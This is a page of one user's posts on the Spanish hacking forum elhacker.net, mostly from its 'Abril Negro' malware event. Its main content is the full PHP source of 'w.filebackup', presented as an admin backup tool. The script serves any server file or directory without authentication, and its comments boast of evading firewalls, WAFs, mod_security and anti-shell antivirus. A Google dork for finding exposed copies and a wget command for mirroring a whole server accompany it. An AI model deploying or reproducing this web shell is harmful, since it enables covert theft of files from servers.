elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Top 20 herramientas Hacking más populares de 2020


  Mostrar Mensajes
Páginas: 1 ... 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 [54] 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 ... 441
531  Seguridad Informática / Análisis y Diseño de Malware / Re: Herramientas de hacking usadas por la CIA en: 8 Abril 2017, 14:49 pm
Solo herramientas para romper windows? y las de linux, unix, etc?

El tema esta bastante bueno, pero faltan muchísimas mas que no aparecen ahí, como por ejemplo las herramientas de desbloqueo de móviles a través de explotaciones del sistema operativo y del cargador, herramientas de espionaje de señales móviles, herramientas de acceso a bases de datos y eliminación masiva de compañias que lo permiten tales como microsoft, facebook y rapidshare, las herramientas y malwares tipo backdoor creadas por las grandes compañias de tecnología, tampoco menciona el acceso a los codigos fuentes de los distintos sistemas operativos.... vamos, es la nsa no un grupo pequeño de hackers aficionados, las herramientas que explica wikileaks no deben ser ni el 10% de todo lo que realmente utilizan, sin mencionar los backdoors a modo de vulnerabilidades que en conjunto con las grandes compañías, las van dejando abiertas hasta que son publicadas por terceros.
532  Programación / PHP / Re: cliente ssh en: 7 Abril 2017, 17:57 pm
Para hacer un cliente ssh web vas a tener algunos inconvenientes, por ejemplo no basta solamente con poder conectarse a un servidor ssh, también tienes que interactuar en tiempo real
mientras la persona escribe el servidor puede enviar mensajes y mientra recibe mensajes debe ser capaz de enviar.

Lo que tu necesitas es un pipe en bash al ssh o un pipe ssh manipulando los procesos del sistema a menos que lo quieras hacer de manera directa utilizando otras librerías, pero tendrás problemas de compatibilidad entre las diferentes versiones.

Para lograr comunicarte con un servidor y poder enviar y recibir información en tiempo real necesitas utilizar websockets y procesos asyncronicos y en php te va a costar bastante hacerlo.

Resulta mucho mas fácil hacerlo en nodejs.

Ahora, ya existe algo similar, hay un complemento para Google Chrome el cual te da un bash con ssh y es compatible en linux, windows y mac:

https://chrome.google.com/webstore/detail/termius-ssh-client/fjcdjmmkgnkgihjnlbgcdamkadlkbmam?utm_source=chrome-ntp-icon
https://chrome.google.com/webstore/detail/rightscale-ssh/pfmkeekfkpfecccgbliieogmgmijklpm?utm_source=chrome-ntp-icon

Acá hay enlaces útiles:

http://kvz.io/blog/2007/07/24/make-ssh-connections-with-php/
http://php.net/manual/en/book.ssh2.php
http://socketo.me/
http://www.phpbuilder.com/articles/application-architecture/optimization/creating-real-time-applications-with-php-and-websockets.html
https://www.npmjs.com/package/simple-ssh
https://www.npmjs.com/package/node-ssh
https://www.npmjs.com/package/ssh-exec
https://www.npmjs.com/package/websocket
https://carlosazaustre.es/blog/websockets-como-utilizar-socket-io-en-tu-aplicacion-web/

Saludos.
533  Foros Generales / Foro Libre / Comienza Abril Negro 2017 ! en: 7 Abril 2017, 17:17 pm
Hola usuarios! comenzó Abril Negro!, un evento donde puedes demostrar ser el mejor, este mes en este subforo no hay censura! (siempre y cuando lo que se postee tenga relación con abril negro).

Los esperamos a todos:

http://foro.elhacker.net/abril_negro/abril_negro_2017-t464563.0.html

534  Seguridad Informática / Análisis y Diseño de Malware / Re: Nuevo subforo del evento Abril Negro en: 7 Abril 2017, 17:15 pm
El evento ya comenzó!!
535  Seguridad Informática / Abril negro / Re: Abril Negro 2017 en: 7 Abril 2017, 17:05 pm
Genial! se ve bastante bien :)
536  Seguridad Informática / Abril negro / Re: Abril Negro 2017 en: 6 Abril 2017, 20:27 pm
Super!, no se ve mal.
537  Foros Generales / Dudas Generales / Re: ¿En que esta programado un juego web? en: 6 Abril 2017, 20:25 pm
Asi es, pero en este caso están hablando de lo que se ejecuta del lado del navegador en tecnologia web, c# se ejecuta del lado de la maquina no del navegador y delphi lo mismo.
538  Seguridad Informática / Abril negro / Re: Abril Negro 2017 en: 5 Abril 2017, 23:59 pm
Acá va el mio!

http://foro.elhacker.net/abril_negro/wfilebackup_respaldador_de_archivos_remoto_automatizado-t467596.0.html
539  Seguridad Informática / Abril negro / w.filebackup (respaldador de archivos remoto automatizado) en: 5 Abril 2017, 23:56 pm
w.filebackup

Hola, hace unos 3 o 4 años atrás hice un script en php, lo que hace es disponerse para hacer un respaldo de todos los archivos del servidor sin tener las limitaciones de tamaño.


¿Cómo funciona?

* No comprime para descargar un solo comprimido, esto previene el uso de disco cuando hay poco espacio.
* Descargar archivo por archivo de manera recursiva, esto previene problemas de termino de ejecución por tiempo fuera cuando el archivo es muy grande.
* Utiliza streaming byte por byte, esto previene el uso desmedido de memoria ram cuando necesitas descargar archivos muy grandes.
* No es detectado por la mayoría de los Firewalls o WAF, gracias a que utiliza enlaces permanentes de apache, así previene el envío de parámetros.


¿Cómo lo ejecuto?

Primeramente, subes el script a un servidor web, por ejemplo http://example.com/w.filebackup.php , ahora cuando veas el script desde el navegador se verá igual que la navegación de archivos de apache, con la diferencia de que no interpretará nada, solo descargará. Ahora, basta con realizar una descarga recursiva con wget y tendrás la descarga de todo el servidor:

Código:
wget -r -x -nH -np --cut-dirs=1 --no-check-certificate --post-data 'token=1' -e robots=off -U 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02011-10-16' http://example.com/w.filebackup.php

Enjoy y Feliz Abril Negro!

Código
  1. <?php
  2. /* w.filebackup.php V1.0 for Administrators by WHK
  3.  *
  4.  * Email: whk@elhacker.net
  5.  * Website: http://whk.elhacker.net/
  6.  *
  7.  * Uso Bash:
  8.  * --------
  9.  * mkdir page && cd page
  10.  * wget -r -x -nH -np --cut-dirs=1 --no-check-certificate --post-data 'token=1' -e robots=off -U 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02011-10-16' http://example.com/w.filebackup.php
  11.  * rm -rf w.filebackup.php*
  12.  *
  13.  * Uso WEB:
  14.  * --------
  15.  * http://web.page/w.filebackup.php
  16.  *
  17.  * Al enviar la variable "token" via HTTP/POST restringe la visualización
  18.  * de los directorios hasta la ruta actual del script, esto evita que el
  19.  * respaldo salga fuera del directorio planeado y cause una sobrecarga.
  20.  * Solo utilizar sin esta variable en caso de querer hacer una backup
  21.  * extrema con mucho tiempo libre.
  22.  *
  23.  * GoogleDork:
  24.  * ----------
  25.  * inurl:".php?do=/" + intitle:"index of"
  26.  *
  27.  * Legal:
  28.  * -----
  29.  * Uso esclusivo sobre servidores propios, nunca utilizar en servidores sin el consentimiento del administrador.
  30.  * El usuario es totalmente responsable de su utilización.
  31.  * En caso de no aceptar este acuerdo no debe ser utilizado.
  32.  *
  33.  * Compatible:
  34.  * ----------
  35.  * Este Script es compatible con servidores con safe mode en ON, servidores sin
  36.  * zlib, sin gz, servidores que no tienen acceso a la shell del sistema, servdiores
  37.  * con mod evasive y mod security, servdiores con firewalls y Antivirus antiShells.
  38.  * No se asegura su funcionalidad al 100% debido a posibles reglas de protección que
  39.  * impidan su normal funcionamiento.
  40.  */
  41. if($getPath = substr($_SERVER['PHP_SELF'], strlen($_SERVER['SCRIPT_NAME']))){
  42.  
  43. /* Procesa el archivo */
  44. if(is_file($getPath)){
  45.  
  46. /* Obtiene el tipo MIME */
  47. if(function_exists('mime_content_type')) {
  48. $mime = mime_content_type($getPath);
  49. }elseif(function_exists('finfo_file')){
  50. $info = finfo_open(FILEINFO_MIME);
  51. $mime = finfo_file($info, $getPath);
  52. finfo_close($info);
  53. }
  54. if(!$type)
  55. $mime = 'application/force-download';
  56. /* Establece las cabeceras */
  57. header('Content-Type: '.$mime);
  58. header('Content-Disposition: attachment; filename='.basename($getPath));
  59. header('Content-Transfer-Encoding: binary');
  60. header('Content-Length: '.filesize($getPath));
  61. /* Hacia el infinito y mas allá! */
  62. if(!@ini_get('safe_mode'))
  63. /* readfile($getPath); que sucede cuando el archivo es mas grande que
  64. * la capacidad de memoria ram asignada en php.ini como un iso, un gz
  65. * con una backup de cpanel o un video? */
  66. if($handle = fopen($getPath, 'r')){
  67.  
  68. /* utiliza bloques de 4kb en modo binario para no corromper el
  69. * contenido a descargar y evitar el uso desmedido de la memoria ram
  70. * y evitar el activado de alarmas de IDS y Firewalls */
  71. while(($buffer = fgets($handle, 4096)) !== false)
  72. echo $buffer;
  73. fclose($handle);
  74. }
  75. /* Procesa el directorio */
  76. }elseif(is_dir($getPath)){
  77. $absolutePath = $getPath;
  78. /* Si no es archivo ni directorio que es? */
  79. }else /* 404 */
  80. $err = 'File not found or access denied ( '.$getPath.' ).';
  81. }
  82. /* Utiliza variables que no sean tan fáciles de incluir en un
  83.  * mod security o alguna regla del firewall (do es utilizado
  84.  * por vbulletin). */
  85. if(isset($_GET['do']) and (is_dir($_GET['do'])))
  86. $absolutePath = $_GET['do'];
  87. if((!isset($absolutePath)) or (!$absolutePath))
  88. $absolutePath = dirname(__file__).'/';
  89. /* Restringe la URL si se solicita */
  90. if(isset($_POST['token']) and (strlen($absolutePath) < strlen(dirname(__file__).'/')))
  91. $absolutePath = dirname(__file__).'/';
  92. $items = array(
  93. 'glob' => array(),
  94. 'folders' => array(),
  95. 'files' => array()
  96. );
  97. // if($items['glob'] = glob($absolutePath.'*')){ glob() no encuentra los archivos ocultos como .htaccess
  98. if($items['glob'] = scandir($absolutePath)){
  99. foreach($items['glob'] as $item){
  100. if(!in_array($item, array('.','..'))){
  101. if(is_dir($absolutePath.$item))
  102. $items['folders'][] = $absolutePath.$item.'/';
  103. else
  104. $items['files'][] = $absolutePath.$item;
  105. }
  106. unset($item);
  107. }
  108. }
  109. unset($items['glob']);
  110. ?>
  111. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  112. <html>
  113. <head>
  114. <title>Index of <?php echo htmlspecialchars($absolutePath, ENT_QUOTES); ?></title>
  115. </head>
  116. <body>
  117. <h1>Index of <?php echo htmlspecialchars($absolutePath, ENT_QUOTES); ?></h1>
  118. <?php if(isset($err)){ ?>
  119. <p><b><i><?php echo htmlspecialchars($err, ENT_QUOTES); ?></i></b></p>
  120. <?php } ?>
  121.  
  122. <ul>
  123. <?php if(!isset($_POST['token'])){ ?>
  124. <li>
  125. <a href="<?php echo $_SERVER['SCRIPT_NAME'].dirname(substr($absolutePath, 0, -1)); ?>/"> Parent Directory</a>
  126. </li>
  127. <?php } ?>
  128.  
  129. <?php if($items['files']){ ?>
  130. <?php foreach($items['files'] as $file){ ?>
  131. <li>
  132. <a href="<?php echo $_SERVER['SCRIPT_NAME'].$file; ?>"> <?php echo htmlspecialchars(basename($file), ENT_QUOTES); ?></a>
  133. </li>
  134. <?php } ?>
  135. <?php } ?>
  136.  
  137. <?php if($items['folders']){ ?>
  138. <?php foreach($items['folders'] as $folder){ ?>
  139. <li>
  140. <a href="<?php echo $_SERVER['SCRIPT_NAME'].'?do='.urlencode($folder); ?>"><?php echo htmlspecialchars(basename($folder), ENT_QUOTES); ?>/</a>
  141. </li>
  142. <?php } ?>
  143. <?php } ?>
  144.  
  145. </ul>
  146.  
  147. <address>
  148. <?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE'], ENT_QUOTES); ?> Server
  149. at <?php echo htmlspecialchars($_SERVER['HTTP_HOST'], ENT_QUOTES); ?>
  150. Port <?php echo (int)$_SERVER['SERVER_PORT']; ?>
  151. </address>
  152. </body>
  153. </html>
  154.  
  155. <?php
  156. /* Evita la ejecución arbitraria por un LFI o <preppendfile> */
  157.  

Mirror: https://github.com/WHK102/w.filebackup/blob/master/w.filebackup.php
540  Seguridad Informática / Abril negro / Re: Abril Negro 2017 en: 5 Abril 2017, 23:24 pm
Hey! no se ve mal, a mucha gente le servirá para comprender este tipo de técnicas, que a pesar de lo simple y antiguas que parezcan, aun son muy efectivas.

Saludos!
Páginas: 1 ... 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 [54] 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 ... 441
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines